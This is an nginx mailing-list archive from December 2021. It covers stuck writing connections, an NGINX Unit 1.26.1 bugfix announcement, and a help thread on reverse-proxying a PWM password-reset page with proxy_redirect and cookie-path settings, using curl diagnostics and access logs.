From nataha1910 at mail.ru Thu Dec 2 10:50:38 2021 From: nataha1910 at mail.ru (=?UTF-8?B?0J3QsNGC0LDQu9GM0Y8g0J/Rg9GH0LrQvtCy0LA=?=) Date: Thu, 02 Dec 2021 13:50:38 +0300 Subject: No subject Message-ID: <1638442238.722407988@f556.i.mail.ru> ? Hi all, ? I faced a problem that when there is a connection and the Internet or?VPN is disconnected while user on our site, the connection gets stuck in the writing state and does not disappear anymore. I am assuming that nginx does not detect that the connection has been interrupted. Has anyone encountered a similar situation? Maybe you know how to solve it (for example, add some setting in the configuration)? ? Thanks, Natalya -------------- next part -------------- An HTML attachment was scrubbed... URL: From nataha1910 at mail.ru Thu Dec 2 13:30:57 2021 From: nataha1910 at mail.ru (=?UTF-8?B?0J3QsNGC0LDQu9GM0Y8g0J/Rg9GH0LrQvtCy0LA=?=) Date: Thu, 02 Dec 2021 16:30:57 +0300 Subject: Growing Writing Connections In-Reply-To: References: Message-ID: <1638451857.317872221@f377.i.mail.ru> Hi all, I faced a problem that when there is a connection and the Internet or?VPN is disconnected while user on our site, the connection gets stuck in the writing state and does not disappear anymore. I am assuming that nginx does not detect that the connection has been interrupted. Has anyone encountered a similar situation? Maybe you know how to solve it (for example, add some setting in the configuration)? Thanks, Natalya >???????, 2 ??????? 2021, 15:00 +03:00 ?? nginx-request at nginx.org: >? >Send nginx mailing list submissions to >nginx at nginx.org > >To subscribe or unsubscribe via the World Wide Web, visit >http://mailman.nginx.org/mailman/listinfo/nginx >or, via email, send a message with subject or body 'help' to >nginx-request at nginx.org > >You can reach the person managing the list at >nginx-owner at nginx.org > >When replying, please edit your Subject line so it is more specific >than "Re: Contents of nginx digest..." > > >Today's Topics: > >???1. (no subject) (??????? ???????) > > >---------------------------------------------------------------------- > >Message: 1 >Date: Thu, 02 Dec 2021 13:50:38 +0300 >From: ??????? ??????? < nataha1910 at mail.ru > >To: nginx at nginx.org >Message-ID: < 1638442238.722407988 at f556.i.mail.ru > >Content-Type: text/plain; charset="utf-8" > > >? >Hi all, >? >I faced a problem that when there is a connection and the Internet or?VPN is disconnected while user on our site, the connection gets stuck in the writing state and does not disappear anymore. I am assuming that nginx does not detect that the connection has been interrupted. >Has anyone encountered a similar situation? Maybe you know how to solve it (for example, add some setting in the configuration)? >? >Thanks, >Natalya >-------------- next part -------------- >An HTML attachment was scrubbed... >URL: < http://mailman.nginx.org/pipermail/nginx/attachments/20211202/88d668a5/attachment-0001.htm > > >------------------------------ > >Subject: Digest Footer > >_______________________________________________ >nginx mailing list >nginx at nginx.org >http://mailman.nginx.org/mailman/listinfo/nginx > >------------------------------ > >End of nginx Digest, Vol 146, Issue 2 >************************************* ? ? ---------------------------------------------------------------------- ? ?????????, ??????? ??????? ? -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Thu Dec 2 14:03:22 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 2 Dec 2021 17:03:22 +0300 Subject: Growing Writing Connections In-Reply-To: <1638451857.317872221@f377.i.mail.ru> References: <1638451857.317872221@f377.i.mail.ru> Message-ID: Hello! On Thu, Dec 02, 2021 at 04:30:57PM +0300, ??????? ??????? wrote: > I faced a problem that when there is a connection and the > Internet or?VPN is disconnected while user on our site, the > connection gets stuck in the writing state and does not > disappear anymore. I am assuming that nginx does not detect that > the connection has been interrupted. > Has anyone encountered a similar situation? Maybe you know how > to solve it (for example, add some setting in the > configuration)? The connection is expected to be closed once the relevant timeout expires or the TCP layer detects that the connection is no longer alive. Usually the send_timeout applies. If you see connections which are stuck for much longer than configured timeouts, this might indicate you are facing a socket leak somewhere. Usually such connections can be also seen as "CLOSED" or "CLOSE_WAIT" in netstat output. In this case first of all I would recommend to make sure you are using a recent enough nginx version, at least 1.20.2 or 1.21.4. -- Maxim Dounin http://mdounin.ru/ From vbart at nginx.com Thu Dec 2 19:23:45 2021 From: vbart at nginx.com (Valentin V. Bartenev) Date: Thu, 02 Dec 2021 22:23:45 +0300 Subject: Unit 1.26.1 release Message-ID: <5771846.lOV4Wx5bFT@vbart-laptop> Hi, I'm glad to announce a new release of NGINX Unit. This is a minor bugfix release that aims to eliminate some annoying regressions revealed after the release of Unit 1.26.0 two weeks ago. Notably, the shared OPcache implementation in that release required introducing some major architectural changes, but our functional tests didn't catch some regressions caused by these changes. Still, thanks to our active community, the issues were reported shortly after the release, and now we can provide an updated version. We will also improve our functional testing to avoid such regressions in the future. The most painful and visible one was that sometimes Unit daemon couldn't completely exit, leaving some zombie processes. However, the second attempt to stop it always succeeded. Also, some DragonFly BSD kernel interfaces are seemingly broken, preventing the Unit daemon from functioning, so we disabled their use when compiling for DragonFly BSD. Changes with Unit 1.26.1 02 Dec 2021 *) Bugfix: occasionally, the Unit daemon was unable to fully terminate; the bug had appeared in 1.26.0. *) Bugfix: a prototype process could crash on an application process exit; the bug had appeared in 1.26.0. *) Bugfix: the router process crashed on reconfiguration if "access_log" was configured without listeners. *) Bugfix: a segmentation fault occurred in the PHP module if chdir() or fastcgi_finish_request() was called in the OPcache preloading script. *) Bugfix: fatal errors on DragonFly BSD; the bug had appeared in 1.26.0. To know more about the bunch of changes introduced in Unit 1.26 and the roadmap for 1.27, please see the previous announcement: - https://mailman.nginx.org/pipermail/unit/2021-November/000288.html Thank you again for keeping your finger on the pulse, reporting issues and submitting feature requests via our GitHub issue tracker: - https://github.com/nginx/unit/issues Stay tuned! wbr, Valentin V. Bartenev From nginx-forum at forum.nginx.org Fri Dec 3 12:37:27 2021 From: nginx-forum at forum.nginx.org (agomes) Date: Fri, 03 Dec 2021 07:37:27 -0500 Subject: Internal application - Publish on nginx Message-ID: <9b68f68b3058cf2ce645125a89375277.NginxMailingListEnglish@forum.nginx.org> Hi people. I am configuring Nginx to publish my Internal portal. My portal is hosted on my server https://x.x.x.x:8443 the principal url of this protal is https://x.x.x.x:8443/pwm/private/login. This URL I don't need to publish. inside this portal I have another URL that I would like to publish. see below. https://x.x.x.x:8443/pwm/public/forgottenpassword I've tried to use the configuration below. ##########################NGINX CONFIGURATION######################### upstream myapp { server x.x.x.x:8443; } server { server_tokens off; modsecurity on; modsecurity_rules_file /etc/nginx/modsec/main.conf; listen 443 ssl; listen 80; server_name x.x.x.x.com; ssl_prefer_server_ciphers On; ssl_protocols TLSv1.2 TLSv1.3; ssl_ciphers AES256+EECDH:AES256+EDH:!aNULL; # security headers add_header X-Frame-Options "SAMEORIGIN" always; add_header X-XSS-Protection "1; mode=block" always; add_header X-Content-Type-Options "nosniff" always; add_header Referrer-Policy "no-referrer-when-downgrade" always; add_header Content-Security-Policy "default-src * data: 'unsafe-eval' 'unsafe-inline'" always; add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always; ssl_certificate /etc/nginx/ssl/wildcard-fullchain.pem; # wildcard ca full chain certificate ssl_certificate_key /etc/nginx/ssl/wildcard-key.pem; # wildcard private certificate client_max_body_size 5M; root /var/www/; index index.html; if ($scheme != "https") { rewrite ^ https://$http_host$request_uri? permanent; } location ^~ /.well-known/pki-validation/ { allow all; root /var/www/; default_type "text/plain"; try_files $uri =404; } location /app { proxy_pass https://myapp/pwm/public/forgottenpassword; #rewrite ^/(.*)/pwm/public$ /$1 break; proxy_redirect default; proxy_set_header Host $host; } access_log /var/log/nginx/access.log myAccess; error_log /var/log/nginx/error.log; } ##########################END CONFIGURATION#################### When I do this, the /app does not work but when try internally the address https://x.x.x.x:8443/pwm/public/forgottenpassword it works like expected. I am working on this for a long time without any result. Thank you in advance for the help. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,292998,292998#msg-292998 From francis at daoine.org Fri Dec 3 13:35:05 2021 From: francis at daoine.org (Francis Daly) Date: Fri, 3 Dec 2021 13:35:05 +0000 Subject: Internal application - Publish on nginx In-Reply-To: <9b68f68b3058cf2ce645125a89375277.NginxMailingListEnglish@forum.nginx.org> References: <9b68f68b3058cf2ce645125a89375277.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20211203133505.GS12557@daoine.org> On Fri, Dec 03, 2021 at 07:37:27AM -0500, agomes wrote: Hi there, > location /app { > proxy_pass https://myapp/pwm/public/forgottenpassword; > #rewrite ^/(.*)/pwm/public$ /$1 break; > proxy_redirect default; > proxy_set_header Host $host; > } > > > access_log /var/log/nginx/access.log myAccess; > error_log /var/log/nginx/error.log; > } > > ##########################END CONFIGURATION#################### > > When I do this, the /app does not work but when try internally the address > https://x.x.x.x:8443/pwm/public/forgottenpassword it works like expected. What response do you get when you do curl -v https://x.x.x.x.com/app ? If that is not the response that you want -- what response do you want instead? I suspect that your "forgottenpassword" application might use more than one url, and what the client gets when it makes the first request may not let it get the other urls. f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Fri Dec 3 14:02:29 2021 From: nginx-forum at forum.nginx.org (agomes) Date: Fri, 03 Dec 2021 09:02:29 -0500 Subject: Internal application - Publish on nginx In-Reply-To: <20211203133505.GS12557@daoine.org> References: <20211203133505.GS12557@daoine.org> Message-ID: <938ccfdf16d36eb64262ab8d9cce54e6.NginxMailingListEnglish@forum.nginx.org> Hi there, follow the command curl -v. ####################################################### curl -v https://x.x.x.x.com/app * Trying x.x.x.x:443... * Connected to x.x.x.x (x.x.x.x) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: /etc/ssl/certs/ca-certificates.crt * CApath: /etc/ssl/certs * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8): * TLSv1.3 (IN), TLS handshake, Certificate (11): * TLSv1.3 (IN), TLS handshake, CERT verify (15): * TLSv1.3 (IN), TLS handshake, Finished (20): * TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.3 (OUT), TLS handshake, Finished (20): * SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 * ALPN, server accepted to use http/1.1 * Server certificate: * subject: CN=*.x.x.x.x * start date: Mar 31 00:00:00 2021 GMT * expire date: Mar 31 23:59:59 2022 GMT * subjectAltName: host "x.x.x.x" matched cert's "*.x.x.x.x" * issuer: x.x.x.x * SSL certificate verify ok. > GET /app HTTP/1.1 > Host: x.x.x.x > User-Agent: curl/7.74.0 > Accept: */* > * TLSv1.3 (IN), TLS handshake, Newsession Ticket (4): * TLSv1.3 (IN), TLS handshake, Newsession Ticket (4): * old SSL session ID is stale, removing * Mark bundle as not supporting multiuse < HTTP/1.1 302 < Server: nginx < Date: Fri, 03 Dec 2021 13:58:45 GMT < Content-Length: 0 < Connection: keep-alive < Vary: Accept-Encoding < Set-Cookie: JSESSIONID=40D508FAD9443C32B4BB3AE5C6AA9E36; Path=/pwm; Secure; HttpOnly; SameSite=Strict < X-PWM-SessionID: x9aPS < Content-Language: en < X-PWM-Noise: 9CCa2PcrE3K2iIpfivfwJuAauf0E81BtclX2NuODNc6hJ3UvdgjJ9PyH6xrV < X-Content-Type-Options: nosniff < X-XSS-Protection: 1 < X-PWM-Instance: 7D0720A46A762638 < X-Frame-Options: DENY < X-PWM-Amb: Bite my shiny metal password! < Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate < Content-Security-Policy: default-src 'self'; object-src 'none'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; script-src https://www.recaptcha.net/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ 'self' 'unsafe-eval' 'nonce-QXHDJS9TCiIEqqEULQJOsSfFYsEGwoXs'; frame-src https://www.recaptcha.net/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ ; report-uri /pwm/public/api?processAction=cspReport < Location: /pwm/public/forgottenpasswordapp?stickyRedirectTest=key < Set-Cookie: ID=3fajhL8QWt9TNKBTc8BQVdvqVxf7IZXOkwqt8unh; Path=/pwm/; Secure; HttpOnly; SameSite=Strict < Set-Cookie: SESSION=H4sIAAAAAAAAAAHLADT_UFdNLkdDTTEQoiWD0ScsDFgNWID788sIL4HXjWo_YbPGxoz_YStjhza8y-hWdTZA5I_UIGSjh54nEgqZmD_JeAiCikLARxHsW1PHRfIp9TfZF05dFqS0WgexsO0TfddkcqT0etZ0_GTmv4xPLCvlRZGwAho9FxYhdIbTeKTUXubNuR0rbluWtWpHwdPHzz5G8u3i_AlRD6vwOZsldN3TVrTCaKgA-uKwykb1BVTdAu5zOg2Yg-LT2oFKupk2TWvoLwV6AG-cetJeZkA1kK_oywAAAA%3D%3D; Path=/pwm/; Secure; HttpOnly; SameSite=Strict < X-Frame-Options: SAMEORIGIN < X-XSS-Protection: 1; mode=block < X-Content-Type-Options: nosniff < Referrer-Policy: no-referrer-when-downgrade < Content-Security-Policy: default-src * data: 'unsafe-eval' 'unsafe-inline' < Strict-Transport-Security: max-age=31536000; includeSubDomains; preload < * Connection #0 to x.x.x.x left intact root at ubuntu-server:/home/agomes# Posted at Nginx Forum: https://forum.nginx.org/read.php?2,292998,293003#msg-293003 From francis at daoine.org Fri Dec 3 14:32:58 2021 From: francis at daoine.org (Francis Daly) Date: Fri, 3 Dec 2021 14:32:58 +0000 Subject: Internal application - Publish on nginx In-Reply-To: <938ccfdf16d36eb64262ab8d9cce54e6.NginxMailingListEnglish@forum.nginx.org> References: <20211203133505.GS12557@daoine.org> <938ccfdf16d36eb64262ab8d9cce54e6.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20211203143258.GT12557@daoine.org> On Fri, Dec 03, 2021 at 09:02:29AM -0500, agomes wrote: Hi there, > follow the command curl -v. Thanks for this. > > GET /app HTTP/1.1 > < HTTP/1.1 302 > < Location: /pwm/public/forgottenpasswordapp?stickyRedirectTest=key > < Set-Cookie: ID=3fajhL8QWt9TNKBTc8BQVdvqVxf7IZXOkwqt8unh; Path=/pwm/; Secure; HttpOnly; SameSite=Strict So your upstream redirected to /pwm/public/forgottenpasswordapp?stickyRedirectTest=key and wanted to set some cookies with Path=/pwm/. And nginx passed those through to the client -- so your nginx logs will probably show the "normal" client making a request for /pwm/public/forgottenpasswordapp?stickyRedirectTest=key, which will get an error response because you don't have a file /var/www/pwm/public/forgottenpasswordapp. proxy_redirect can be used to change the first of those. proxy_cookie_path can be used to change the second, sort of. You did set "proxy_redirect default;", but that does not catch the no-host Location response in this case. So, I suggest: * use proxy_redirect /pwm/public/forgottenpasswordapp /app; and repeat the "curl"; you should see either "Location: /app?sticky..." or "Location: https://x.x.x.com/app?sticky...". If you do, then repeat the "curl" with the "?sticky..." part attached. I *suspect* that second request will indicate a "missing cookie" failure. You can then try to access /app in your browser, and see what that does -- if it also indicates the "missing cookie" failure, then you decide how to "fix" the cookies. If you are happy for the cookie to potentially be sent to anything on your x.x.x.com server, then proxy_cookie_path /pwm/ /; may work. Maybe "/app" and the end could work too -- it does depend on what else the upstream app might send. (The upstream app is entirely below /pwm/; the front-end version is not below /app/ (trailing slash); so it is not trivial to map between the two.) Good luck with it, f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Fri Dec 3 15:05:57 2021 From: nginx-forum at forum.nginx.org (agomes) Date: Fri, 03 Dec 2021 10:05:57 -0500 Subject: Internal application - Publish on nginx In-Reply-To: <20211203143258.GT12557@daoine.org> References: <20211203143258.GT12557@daoine.org> Message-ID: <8656bc9d7d3ff8c7cf373a8e67936d99.NginxMailingListEnglish@forum.nginx.org> Hi Francis, I really appreciate your help. in my location /app I have this configuration. location /app { proxy_pass https://resetpass/pwm/public/forgottenpasswordapp; #rewrite ^/(.*)/pwm/public$ /$1 break; proxy_redirect /pwm/public/forgottenpasswordapp /app; #proxy_set_header Host $host; } when I run the curl -v command I have this output. ################################ root at ubuntu-server:/home/agomes# curl -v https://x.x.x.x/app * Trying 65.39.150.151:443... * Connected to x.x.x.x (x.x.x.x) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: /etc/ssl/certs/ca-certificates.crt * CApath: /etc/ssl/certs * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8): * TLSv1.3 (IN), TLS handshake, Certificate (11): * TLSv1.3 (IN), TLS handshake, CERT verify (15): * TLSv1.3 (IN), TLS handshake, Finished (20): * TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.3 (OUT), TLS handshake, Finished (20): * SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 * ALPN, server accepted to use http/1.1 * Server certificate: * subject: CN=*.x.x.x.x * start date: Mar 31 00:00:00 2021 GMT * expire date: Mar 31 23:59:59 2022 GMT * subjectAltName: host "x.x.x.x" matched cert's "*.x.x.x.x" * issuer: xxxxx * SSL certificate verify ok. > GET /app HTTP/1.1 > Host: x.x.x.x > User-Agent: curl/7.74.0 > Accept: */* > * TLSv1.3 (IN), TLS handshake, Newsession Ticket (4): * TLSv1.3 (IN), TLS handshake, Newsession Ticket (4): * old SSL session ID is stale, removing * Mark bundle as not supporting multiuse < HTTP/1.1 302 < Server: nginx < Date: Fri, 03 Dec 2021 15:01:45 GMT < Content-Length: 0 < Location: https://x.x.x.x/app?stickyRedirectTest=key < Connection: keep-alive < Vary: Accept-Encoding < Set-Cookie: JSESSIONID=D70474FE95784C0A07C659A05D224233; Path=/pwm; Secure; HttpOnly; SameSite=Strict < X-PWM-SessionID: YXAYQ < Content-Language: en < X-PWM-Noise: VTRHPaZo4u06vSjXq956ujfN1G2s1Y < X-Content-Type-Options: nosniff < X-XSS-Protection: 1 < X-PWM-Instance: 7D0720A46A762638 < X-Frame-Options: DENY < X-PWM-Amb: in the future, you'll just /think/ your password < Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate < Content-Security-Policy: default-src 'self'; object-src 'none'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; script-src https://www.recaptcha.net/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ 'self' 'unsafe-eval' 'nonce-vSpzMNrxkvmBUtzLvNHnmxbEQREymvtV'; frame-src https://www.recaptcha.net/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ ; report-uri /pwm/public/api?processAction=cspReport < Set-Cookie: ID=yiElg4A1ZZXYfaMTaNsCOzLDDq1v6xtYkwqvhuxh; Path=/pwm/; Secure; HttpOnly; SameSite=Strict < Set-Cookie: SESSION=H4sIAAAAAAAAAAHLADT_UFdNLkdDTTEQoiWD0ScsDFgNWID788sONPQqGgXG0dbsSPDwD0jaK588y_9z6aL9Zy8cRnp56mjEjt6iDZIEy4ihINlmcYFVSicYNMuIBrM68x2hbaGTMZHi_K-Mk2OjegRLtQLipXqKjZe_ylyMkmtuZDYicv9bhoQaOe1VtblF2khZUf9gNzJ2If0mW_nIOci5vR3EeonJNbnh-tjBx4GATIo46jwalNfr2BvPQrgbdb-t74Pz0i1rGyQ-2CaGOLGJIPUhWckgZZh-WTxzywAAAA%3D%3D; Path=/pwm/; Secure; HttpOnly; SameSite=Strict < X-Frame-Options: SAMEORIGIN < X-XSS-Protection: 1; mode=block < X-Content-Type-Options: nosniff < Referrer-Policy: no-referrer-when-downgrade < Content-Security-Policy: default-src * data: 'unsafe-eval' 'unsafe-inline' < Strict-Transport-Security: max-age=31536000; includeSubDomains; preload < * Connection #0 to host x.x.x.x left intact ###################### In the browser bar I have this https://x.x.x.x/app?stickyRedirectTest=key internally on the application everhthing works very well. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,292998,293005#msg-293005 From francis at daoine.org Fri Dec 3 15:59:39 2021 From: francis at daoine.org (Francis Daly) Date: Fri, 3 Dec 2021 15:59:39 +0000 Subject: Internal application - Publish on nginx In-Reply-To: <8656bc9d7d3ff8c7cf373a8e67936d99.NginxMailingListEnglish@forum.nginx.org> References: <20211203143258.GT12557@daoine.org> <8656bc9d7d3ff8c7cf373a8e67936d99.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20211203155939.GU12557@daoine.org> On Fri, Dec 03, 2021 at 10:05:57AM -0500, agomes wrote: Hi there, > in my location /app I have this configuration. > > location /app { > proxy_pass https://resetpass/pwm/public/forgottenpasswordapp; > #rewrite ^/(.*)/pwm/public$ /$1 break; > proxy_redirect /pwm/public/forgottenpasswordapp /app; > #proxy_set_header Host $host; > } > > when I run the curl -v command I have this output. > > root at ubuntu-server:/home/agomes# curl -v https://x.x.x.x/app > < Location: https://x.x.x.x/app?stickyRedirectTest=key > < Set-Cookie: JSESSIONID=D70474FE95784C0A07C659A05D224233; Path=/pwm; > < Set-Cookie: ID=yiElg4A1ZZXYfaMTaNsCOzLDDq1v6xtYkwqvhuxh; Path=/pwm/; > > In the browser bar I have this https://x.x.x.x/app?stickyRedirectTest=key > > internally on the application everhthing works very well. The proxy_redirect has changed the Location: response, which is good. What does curl -v https://x.x.x.x/app?stickyRedirectTest=key return? Can you see in your browser "developer tools console" what series of requests and responses are made when things work using the internal system directly; and how far in that sequence does it get when you go through nginx? I suggest trying (in the short term, at least) proxy_cookie_path ~^/pwm.* /app; in the same location{} block, and seeing if that makes any useful change to the response when the browser goes through nginx. Cheers, f -- Francis Daly francis at daoine.org From nginx-forum at forum.nginx.org Fri Dec 3 16:34:56 2021 From: nginx-forum at forum.nginx.org (agomes) Date: Fri, 03 Dec 2021 11:34:56 -0500 Subject: Internal application - Publish on nginx In-Reply-To: <20211203155939.GU12557@daoine.org> References: <20211203155939.GU12557@daoine.org> Message-ID: Hi Francis, Follow the curl -v ####################### root at ubuntu-server:/home/agomes# curl -v https://x.x.x.x/app?stickyRedirectTest=key * Trying x.x.x.x:443... * Connected to x.x.x.x (x.x.x.x) port 443 (#0) * ALPN, offering h2 * ALPN, offering http/1.1 * successfully set certificate verify locations: * CAfile: /etc/ssl/certs/ca-certificates.crt * CApath: /etc/ssl/certs * TLSv1.3 (OUT), TLS handshake, Client hello (1): * TLSv1.3 (IN), TLS handshake, Server hello (2): * TLSv1.3 (IN), TLS handshake, Encrypted Extensions (8): * TLSv1.3 (IN), TLS handshake, Certificate (11): * TLSv1.3 (IN), TLS handshake, CERT verify (15): * TLSv1.3 (IN), TLS handshake, Finished (20): * TLSv1.3 (OUT), TLS change cipher, Change cipher spec (1): * TLSv1.3 (OUT), TLS handshake, Finished (20): * SSL connection using TLSv1.3 / TLS_AES_256_GCM_SHA384 * ALPN, server accepted to use http/1.1 * Server certificate: * subject: CN=*.x.x.x.x.com * start date: Mar 31 00:00:00 2021 GMT * expire date: Mar 31 23:59:59 2022 GMT * subjectAltName: host "x.x.x.x.com" matched cert's "*.x.x.x.x.com" * issuer: x.x.x.x * SSL certificate verify ok. > GET /app?stickyRedirectTest=key HTTP/1.1 > Host: x.x.x.x.com > User-Agent: curl/7.74.0 > Accept: */* > * TLSv1.3 (IN), TLS handshake, Newsession Ticket (4): * TLSv1.3 (IN), TLS handshake, Newsession Ticket (4): * old SSL session ID is stale, removing * Mark bundle as not supporting multiuse < HTTP/1.1 302 < Server: nginx < Date: Fri, 03 Dec 2021 16:19:30 GMT < Content-Length: 0 < Location: https://x.x.x.x/app < Connection: keep-alive < Vary: Accept-Encoding < Set-Cookie: JSESSIONID=AAB544EAB8D7EB2ADBC1A6586A8488C0; Path=/pwm; Secure; HttpOnly; SameSite=Strict < X-PWM-SessionID: bD04y < Content-Language: en < X-PWM-Noise: vhz2n6pAC3u4HK4iUMn9rckjReGEH < X-Content-Type-Options: nosniff < X-XSS-Protection: 1 < X-PWM-Instance: 7D0720A46A762638 < X-Frame-Options: DENY < X-PWM-Amb: if its broke, it's krowten's fault < Cache-Control: no-cache, no-store, must-revalidate, proxy-revalidate < Content-Security-Policy: default-src 'self'; object-src 'none'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; script-src https://www.recaptcha.net/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ 'self' 'unsafe-eval' 'nonce-S4MPinwLctwCgOvE3YkfzXDu5ieb6yCh'; frame-src https://www.recaptcha.net/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ ; report-uri /pwm/public/api?processAction=cspReport < Set-Cookie: ID=1NB7WIPZ99tarLf4xpYH6OdYOVV8mbjpkwqy9utk; Path=/pwm/; Secure; HttpOnly; SameSite=Strict < Set-Cookie: SESSION=H4sIAAAAAAAAAAHLADT_UFdNLkdDTTEQoiWD0ScsDFgNWID788sURuVmAvS5EFkHh6_Z_SUXKTh_OPP34r6bZ2qCbzkXniGokm0POG_z-xEnuaILx79beMlnrLdzSslwzEIleeZG3Ld4XCtX-GdampE4X-jSo1EnDSvIwg2okbpn32JF-9mpJ-Mor-tpWmEe3eW3-deUeJ2VuPX_EbLdXmKjDpzlhWxknh3nVitS9jtqV4v4PRspwJ5PnKBmoeOdNVnoi3-hblN5gBpNyP0lLQV5DsQ85N9FodJW45e2ywAAAA%3D%3D; Path=/pwm/; Secure; HttpOnly; SameSite=Strict < X-Frame-Options: SAMEORIGIN < X-XSS-Protection: 1; mode=block < X-Content-Type-Options: nosniff < Referrer-Policy: no-referrer-when-downgrade < Content-Security-Policy: default-src * data: 'unsafe-eval' 'unsafe-inline' < Strict-Transport-Security: max-age=31536000; includeSubDomains; preload < * Connection #0 to host c360-lab.isecurityconsulting.com left intact ################## When I try to use proxy_cookie_path ~^/pwm.* /app; in the location. (see below) location /app { proxy_pass https://resetpass/pwm/public/forgottenpasswordapp; #rewrite ^/(.*)/pwm/public$ /$1 break; proxy_redirect /pwm/public/forgottenpasswordapp /app; #proxy_set_header Host $host; proxy_cookie_path ~^/pwm.* /app; } I've got some stranges carachteres on the web page. And in the deve tools in the browser, internally I have a lot of connections to the uri https://x.x.x.x:8443/pwm/public/resources I think that I need to appoint this path in somewhere in the nginx config. Posted at Nginx Forum: https://forum.nginx.org/read.php?2,292998,293007#msg-293007 From nginx-forum at forum.nginx.org Fri Dec 3 17:57:06 2021 From: nginx-forum at forum.nginx.org (agomes) Date: Fri, 03 Dec 2021 12:57:06 -0500 Subject: Internal application - Publish on nginx In-Reply-To: References: <20211203155939.GU12557@daoine.org> Message-ID: <660c1368b9068e8129e77debb3c6fb63.NginxMailingListEnglish@forum.nginx.org> Hi, Now my configuration is like below: location /app/ { proxy_pass https://myappp; #rewrite ^/(.*)/pwm/public$ /$1 break; proxy_redirect https://resetpass/pwm/public/forgottenpassword /app/; #proxy_set_header Host $host; #proxy_cookie_path ~^/pwm/* /app; } location /pwm { proxy_pass https://myappp; proxy_redirect default; proxy_set_header Host $host; } =============================== I can see on the access logs that the connection is going to resources path correctly, but the page still not appears to me. I've got this message. Error Password Self Service PWM Error PWM 5025 Maximum login attempts for this session have been exceeded. Try again later. Idle Timeout: 5 minutes =================== Follow the logs. [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /app/ HTTP/1.1" 200 104 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.007 0.008 "0.88" [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /pwm HTTP/1.1" 302 5 "x.x.x.x/app/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.005 0.004 "-" [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /pwm/ HTTP/1.1" 200 1430 "x.x.x.x/app/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.011 0.008 "-" [03/Dec/2021:17:54:28 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/pwm-icons.css HTTP/1.1" 200 1549 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.005 0.004 "2.63" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/style.css HTTP/1.1" 200 1549 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.009 0.008 "2.63" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/js/main.js HTTP/1.1" 200 1550 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.008 0.008 "2.62" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET /pwm/public/resources/nonce-135vkyu/webjars/dojo/dojo.js HTTP/1.1" 200 1549 "x.x.x.x/pwm/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.41" "x.x.x.x:8443" 0.008 0.008 "2.63" [03/Dec/2021:17:54:29 +0000] "x.x.x.x" "GET 